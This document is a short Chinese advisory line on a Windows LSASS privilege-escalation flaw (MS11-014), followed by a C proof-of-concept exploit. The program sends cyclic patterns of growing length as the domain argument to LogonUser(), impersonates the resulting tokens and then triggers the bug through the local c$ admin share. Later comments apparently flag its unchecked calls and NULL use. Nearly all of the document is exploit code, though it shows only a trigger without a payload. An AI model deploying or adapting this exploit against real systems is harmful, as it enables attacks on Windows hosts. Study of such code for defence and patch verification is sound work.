Microsoft Windows  本地安全授权子系统服务(LSASS)进程处理特制的身份验证请求时存在权限提升漏洞,攻击者可利用此漏洞以提升的权限执行代码,从而完全控制受影响系统。
 

// @author      : m_101
// @website     : http://binholic.blogspot.com/
// @licence     : beerware
// @year        : 2012
// @reference   : MS11-014
// @source      : Jorge Moura and http://newsoft-tech.blogspot.com/2012/01/ms11-014-this-is-not-bug-your-are.html
#include <stdio.h>
#include <stdlib.h>

#define _WIN32_WINNT 0x0501
#include <windows.h>
#include <tchar.h>

#include <stdint.h>

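#define ALPHA_UPPER     "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
#define ALPHA_LOWER     "abcdefghijklmnopqrstuvwxyz"
#define DIGITS          "0123456789"

/*
 * Create a cyclic, non-repeating pattern of szPattern bytes following the
 * Metasploit pattern_create algorithm: successive bytes are drawn from the
 * upper-case, lower-case and digit charsets in turn, and the charset offsets
 * advance like an odometer ("Aa0Aa1Aa2...Aa9Ab0Ab1...").
 *
 * @param szPattern  number of pattern bytes to produce
 * @return heap buffer holding szPattern bytes plus a terminating NUL, owned
 *         by the caller (release with free()); NULL when szPattern is 0 or
 *         when the allocation fails
 */
unsigned char* pattern_create (size_t szPattern)
{
    enum { N_CHARSETS = 3 };
    static const char *const charsets[N_CHARSETS] = { ALPHA_UPPER, ALPHA_LOWER, DIGITS };
    static const size_t szCharsets[N_CHARSETS] = {
        sizeof(ALPHA_UPPER) - 1, sizeof(ALPHA_LOWER) - 1, sizeof(DIGITS) - 1
    };
    size_t offsets[N_CHARSETS] = {0};   /* current index into each charset */
    unsigned char *pattern;
    size_t idxPattern = 0;

    if (!szPattern)
        return NULL;

    /* single allocation; calloc() zero-fills, so the extra byte is the NUL
     * terminator and no separate per-charset heap copies are needed */
    pattern = calloc(szPattern + 1, sizeof *pattern);
    if (!pattern)
        return NULL;

    while (idxPattern < szPattern)
    {
        /* emit one byte from each charset, stopping early at the requested size */
        for (size_t set = 0; set < N_CHARSETS && idxPattern < szPattern; set++)
        {
            pattern[idxPattern++] = (unsigned char)charsets[set][offsets[set]];
        }

        /* odometer advance: bump the last charset's offset and carry into the
         * previous charset each time an offset wraps back to 0 */
        for (int set = N_CHARSETS - 1; set >= 0; set--)
        {
            offsets[set] = (offsets[set] + 1) % szCharsets[set];
            if (offsets[set] != 0)
                break;
        }
    }

    return pattern;
}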

/*
 * Build a NUL-terminated buffer consisting of n copies of one byte value.
 *
 * @param byte  the byte value to repeat
 * @param n     number of copies
 * @return caller-owned heap buffer of n bytes plus a trailing NUL (free() it),
 *         or NULL when the allocation fails
 */
char* byte_repeat(uint8_t byte, size_t n)
{
    char *out = calloc(n + 1, sizeof *out);   /* +1 keeps the terminator */
    if (out == NULL)
        return NULL;

    for (size_t i = 0; i < n; i++)
        out[i] = (char)byte;

    return out;
}

/*
 * Proof-of-concept driver for MS11-014: calls LogonUser() with a domain
 * argument of growing length, then opens a file on the local c$ admin share.
 * argc and argv are unused.  Every Win32 return value below is discarded, so
 * the program cannot distinguish a failed logon or open from a successful one.
 */
int main(int argc, char *argv[])
{
    char *buffer;
    HANDLE hToken;   // never initialised here; only LogonUser() writes it
    int idx;

    // overflow
    // length sweep: 0, 4, 8, ... 2044 bytes per LogonUser() call
    for (idx = 0; idx < 2048; idx += 4)
    {
        // NULL on the first iteration (idx == 0) and on calloc() failure;
        // neither case is checked before the uses below
        buffer = pattern_create(idx);

        // BOOL result ignored; if the call fails, hToken presumably keeps its
        // stale or indeterminate value yet is still passed to
        // ImpersonateLoggedOnUser() below -- confirm against the Win32 contract
        LogonUser(
            _T("username"),
            (TCHAR*)buffer,   // cast hides a char*/TCHAR* mismatch in a UNICODE build; confirm build flags
            _T("password"),
            LOGON32_LOGON_NEW_CREDENTIALS, // defined as 9
            LOGON32_PROVIDER_WINNT50, // defined as 0
            &hToken
        );

        // "%s" with a NULL buffer (first iteration) is undefined behaviour
        printf("pattern(%5d): %s\n", idx, buffer);

        free(buffer);

        // return value ignored; hToken is never released with CloseHandle(),
        // so every iteration that obtained a token leaks its handle
        ImpersonateLoggedOnUser(hToken);
    }

    // trigger
    // the returned HANDLE is neither checked nor closed
    CreateFile(
        _T("\\\\127.0.0.1\\c$\\boot.ini"),
        GENERIC_READ,
        FILE_SHARE_READ|FILE_SHARE_WRITE,
        NULL, // security attributes
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    return 0;
}